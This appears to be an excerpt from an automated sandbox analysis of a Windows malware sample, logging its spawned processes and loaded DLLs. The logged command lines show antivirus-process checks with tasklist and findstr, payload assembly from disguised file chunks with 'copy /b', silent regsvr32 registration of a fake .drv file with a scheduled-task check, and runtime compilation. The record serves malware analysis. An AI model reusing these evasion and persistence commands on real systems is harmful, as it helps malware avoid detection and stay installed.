Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr /V "Tunnel" Addresses
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b 764661\Macromedia.com + Totally + York + Drunk + Baghdad + Benz + Glasses + Pac + Tender + Racing + Deluxe + Derived 764661\Macromedia.com
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b ..\Complement + ..\Soundtrack + ..\Plumbing + ..\Hills F
Source: C:\Users\user\Desktop\DbCMTMgeJo.exe	Process created: C:\Users\user\AppData\Local\Temp\UYYHR2FFXPC7QWGDTJ69V7UUE7H8M00.exe "C:\Users\user\AppData\Local\Temp\UYYHR2FFXPC7QWGDTJ69V7UUE7H8M00.exe"	Jump to behavior
Source: C:\Users\user\Desktop\DbCMTMgeJo.exe	Process created: C:\Users\user\AppData\Local\Temp\EUONBTH0X1WAZ900JF4PYRKDM.exe "C:\Users\user\AppData\Local\Temp\EUONBTH0X1WAZ900JF4PYRKDM.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EUONBTH0X1WAZ900JF4PYRKDM.exe	Process created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe "C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1062141001\c153ad0ce0.exe "C:\Users\user\AppData\Local\Temp\1062141001\c153ad0ce0.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1062142001\63460ff8c7.exe "C:\Users\user\AppData\Local\Temp\1062142001\63460ff8c7.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1062143001\1639401074.exe "C:\Users\user\AppData\Local\Temp\1062143001\1639401074.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1062144001\21aaa725bd.exe "C:\Users\user\AppData\Local\Temp\1062144001\21aaa725bd.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1062145001\8ec89b23d4.exe "C:\Users\user\AppData\Local\Temp\1062145001\8ec89b23d4.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1062146001\5ec73896e9.exe "C:\Users\user\AppData\Local\Temp\1062146001\5ec73896e9.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1062141001\c153ad0ce0.exe	Process created: C:\Users\user\AppData\Local\Temp\1062141001\c153ad0ce0.exe "C:\Users\user\AppData\Local\Temp\1062141001\c153ad0ce0.exe"	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 392 -p 5256 -ip 5256
Source: C:\Windows\System32\svchost.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 5256 -s 956
Source: C:\Windows\SysWOW64\WerFault.exe	Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\1062142001\63460ff8c7.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c copy Investor Investor.cmd & Investor.cmd
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\tasklist.exe tasklist
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr /I "opssvc wrsa"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\tasklist.exe tasklist
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c md 36469
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\extrac32.exe extrac32 /Y /E Geographic
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr /V "TEAMS" Mw
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b 36469\Avoiding.com + Hood + Centered + Collectors + Visual + Additionally + Celebration + Flesh + Ventures + Waters 36469\Avoiding.com
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b ..\Characterized + ..\Entries + ..\Arbitration + ..\Put + ..\Comics + ..\Japanese L
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\36469\Avoiding.com Avoiding.com L
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\choice.exe choice /d y /t 5
Source: C:\Users\user\AppData\Local\Temp\36469\Avoiding.com	Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\36469\Avoiding.com	Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\36469\Avoiding.com	Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\36469\Avoiding.com	Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\1062144001\21aaa725bd.exe	Process created: C:\Users\user\AppData\Local\Temp\is-GRC2D.tmp\21aaa725bd.tmp "C:\Users\user\AppData\Local\Temp\is-GRC2D.tmp\21aaa725bd.tmp" /SL5="$50482,1104885,161792,C:\Users\user\AppData\Local\Temp\1062144001\21aaa725bd.exe"
Source: C:\Users\user\AppData\Local\Temp\is-GRC2D.tmp\21aaa725bd.tmp	Process created: C:\Users\user\AppData\Local\Temp\1062144001\21aaa725bd.exe "C:\Users\user\AppData\Local\Temp\1062144001\21aaa725bd.exe" /VERYSILENT
Source: C:\Users\user\AppData\Local\Temp\1062144001\21aaa725bd.exe	Process created: C:\Users\user\AppData\Local\Temp\is-3HIKL.tmp\21aaa725bd.tmp "C:\Users\user\AppData\Local\Temp\is-3HIKL.tmp\21aaa725bd.tmp" /SL5="$80484,1104885,161792,C:\Users\user\AppData\Local\Temp\1062144001\21aaa725bd.exe" /VERYSILENT
Source: C:\Users\user\AppData\Local\Temp\is-3HIKL.tmp\21aaa725bd.tmp	Process created: C:\Windows\SysWOW64\regsvr32.exe "regsvr32.exe" /s /i:SYNC "C:\Users\user\AppData\Roaming\\uxtheme_2.drv"
Source: C:\Windows\SysWOW64\regsvr32.exe	Process created: C:\Windows\System32\regsvr32.exe /s /i:SYNC "C:\Users\user\AppData\Roaming\\uxtheme_2.drv"
Source: C:\Windows\System32\regsvr32.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command "if (Get-ScheduledTask \| Where-Object { $_.Actions.Execute -eq 'regsvr32' -and $_.Actions.Arguments -eq '/S /i:SYNC C:\Users\user\AppData\Roaming\uxtheme_2.drv' }) { exit 0 } else { exit 1 }"
Source: C:\Windows\System32\regsvr32.exe	Process created: unknown unknown
Source: C:\Windows\System32\regsvr32.exe	Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\1062145001\8ec89b23d4.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c copy Turner Turner.cmd & Turner.cmd
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\tasklist.exe tasklist
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr /I "opssvc wrsa"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\tasklist.exe tasklist
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c md 764661
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\extrac32.exe extrac32 /Y /E Fm
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr /V "Tunnel" Addresses
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b 764661\Macromedia.com + Totally + York + Drunk + Baghdad + Benz + Glasses + Pac + Tender + Racing + Deluxe + Derived 764661\Macromedia.com
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b ..\Complement + ..\Soundtrack + ..\Plumbing + ..\Hills F
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\1062146001\5ec73896e9.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\gaqlxgdr\gaqlxgdr.cmdline"
Source: C:\Users\user\AppData\Local\Temp\1062146001\5ec73896e9.exe	Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\1062146001\5ec73896e9.exe	Process created: unknown unknown
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESEB10.tmp" "c:\Users\user\AppData\Local\Temp\gaqlxgdr\CSCB36A130CAC24B60A582C1D3CEEF98E.TMP"

Source: C:\Users\user\Desktop\DbCMTMgeJo.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\DbCMTMgeJo.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\Desktop\DbCMTMgeJo.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\DbCMTMgeJo.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\DbCMTMgeJo.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\DbCMTMgeJo.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\DbCMTMgeJo.exe	Section loaded: webio.dll	Jump to behavior
Source: C:\Users\user\Desktop\DbCMTMgeJo.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\DbCMTMgeJo.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\DbCMTMgeJo.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\DbCMTMgeJo.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\DbCMTMgeJo.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\DbCMTMgeJo.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\Desktop\DbCMTMgeJo.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\Desktop\DbCMTMgeJo.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\Desktop\DbCMTMgeJo.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\Desktop\DbCMTMgeJo.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\DbCMTMgeJo.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\Desktop\DbCMTMgeJo.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\Desktop\DbCMTMgeJo.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\DbCMTMgeJo.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\DbCMTMgeJo.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\DbCMTMgeJo.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\DbCMTMgeJo.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\DbCMTMgeJo.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\DbCMTMgeJo.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\DbCMTMgeJo.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\DbCMTMgeJo.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\DbCMTMgeJo.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\Desktop\DbCMTMgeJo.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\DbCMTMgeJo.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\DbCMTMgeJo.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\DbCMTMgeJo.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\DbCMTMgeJo.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\DbCMTMgeJo.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\DbCMTMgeJo.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\DbCMTMgeJo.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\DbCMTMgeJo.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\DbCMTMgeJo.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\DbCMTMgeJo.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\DbCMTMgeJo.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\UYYHR2FFXPC7QWGDTJ69V7UUE7H8M00.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\UYYHR2FFXPC7QWGDTJ69V7UUE7H8M00.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\UYYHR2FFXPC7QWGDTJ69V7UUE7H8M00.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\UYYHR2FFXPC7QWGDTJ69V7UUE7H8M00.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\UYYHR2FFXPC7QWGDTJ69V7UUE7H8M00.exe	Section loaded: rstrtmgr.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\UYYHR2FFXPC7QWGDTJ69V7UUE7H8M00.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\UYYHR2FFXPC7QWGDTJ69V7UUE7H8M00.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\UYYHR2FFXPC7QWGDTJ69V7UUE7H8M00.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\UYYHR2FFXPC7QWGDTJ69V7UUE7H8M00.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\UYYHR2FFXPC7QWGDTJ69V7UUE7H8M00.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\UYYHR2FFXPC7QWGDTJ69V7UUE7H8M00.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\UYYHR2FFXPC7QWGDTJ69V7UUE7H8M00.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\UYYHR2FFXPC7QWGDTJ69V7UUE7H8M00.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\UYYHR2FFXPC7QWGDTJ69V7UUE7H8M00.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\UYYHR2FFXPC7QWGDTJ69V7UUE7H8M00.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\UYYHR2FFXPC7QWGDTJ69V7UUE7H8M00.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\UYYHR2FFXPC7QWGDTJ69V7UUE7H8M00.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\UYYHR2FFXPC7QWGDTJ69V7UUE7H8M00.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\UYYHR2FFXPC7QWGDTJ69V7UUE7H8M00.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\UYYHR2FFXPC7QWGDTJ69V7UUE7H8M00.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EUONBTH0X1WAZ900JF4PYRKDM.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EUONBTH0X1WAZ900JF4PYRKDM.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EUONBTH0X1WAZ900JF4PYRKDM.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EUONBTH0X1WAZ900JF4PYRKDM.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EUONBTH0X1WAZ900JF4PYRKDM.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EUONBTH0X1WAZ900JF4PYRKDM.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EUONBTH0X1WAZ900JF4PYRKDM.exe	Section loaded: mstask.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EUONBTH0X1WAZ900JF4PYRKDM.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EUONBTH0X1WAZ900JF4PYRKDM.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EUONBTH0X1WAZ900JF4PYRKDM.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EUONBTH0X1WAZ900JF4PYRKDM.exe	Section loaded: dui70.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EUONBTH0X1WAZ900JF4PYRKDM.exe	Section loaded: duser.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EUONBTH0X1WAZ900JF4PYRKDM.exe	Section loaded: chartv.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EUONBTH0X1WAZ900JF4PYRKDM.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EUONBTH0X1WAZ900JF4PYRKDM.exe	Section loaded: oleacc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EUONBTH0X1WAZ900JF4PYRKDM.exe	Section loaded: atlthunk.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EUONBTH0X1WAZ900JF4PYRKDM.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EUONBTH0X1WAZ900JF4PYRKDM.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EUONBTH0X1WAZ900JF4PYRKDM.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EUONBTH0X1WAZ900JF4PYRKDM.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EUONBTH0X1WAZ900JF4PYRKDM.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EUONBTH0X1WAZ900JF4PYRKDM.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EUONBTH0X1WAZ900JF4PYRKDM.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EUONBTH0X1WAZ900JF4PYRKDM.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EUONBTH0X1WAZ900JF4PYRKDM.exe	Section loaded: wtsapi32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EUONBTH0X1WAZ900JF4PYRKDM.exe	Section loaded: winsta.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EUONBTH0X1WAZ900JF4PYRKDM.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EUONBTH0X1WAZ900JF4PYRKDM.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EUONBTH0X1WAZ900JF4PYRKDM.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EUONBTH0X1WAZ900JF4PYRKDM.exe	Section loaded: explorerframe.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EUONBTH0X1WAZ900JF4PYRKDM.exe	Section loaded: windows.fileexplorer.common.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EUONBTH0X1WAZ900JF4PYRKDM.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EUONBTH0X1WAZ900JF4PYRKDM.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EUONBTH0X1WAZ900JF4PYRKDM.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EUONBTH0X1WAZ900JF4PYRKDM.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EUONBTH0X1WAZ900JF4PYRKDM.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EUONBTH0X1WAZ900JF4PYRKDM.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EUONBTH0X1WAZ900JF4PYRKDM.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EUONBTH0X1WAZ900JF4PYRKDM.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EUONBTH0X1WAZ900JF4PYRKDM.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EUONBTH0X1WAZ900JF4PYRKDM.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EUONBTH0X1WAZ900JF4PYRKDM.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EUONBTH0X1WAZ900JF4PYRKDM.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1062141001\c153ad0ce0.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1062141001\c153ad0ce0.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1062141001\c153ad0ce0.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1062141001\c153ad0ce0.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1062141001\c153ad0ce0.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1062141001\c153ad0ce0.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1062141001\c153ad0ce0.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1062141001\c153ad0ce0.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1062141001\c153ad0ce0.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1062141001\c153ad0ce0.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1062141001\c153ad0ce0.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1062141001\c153ad0ce0.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1062141001\c153ad0ce0.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1062141001\c153ad0ce0.exe	Section loaded: webio.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1062141001\c153ad0ce0.exe	Section loaded: mswsock.dll	Jump to behavior
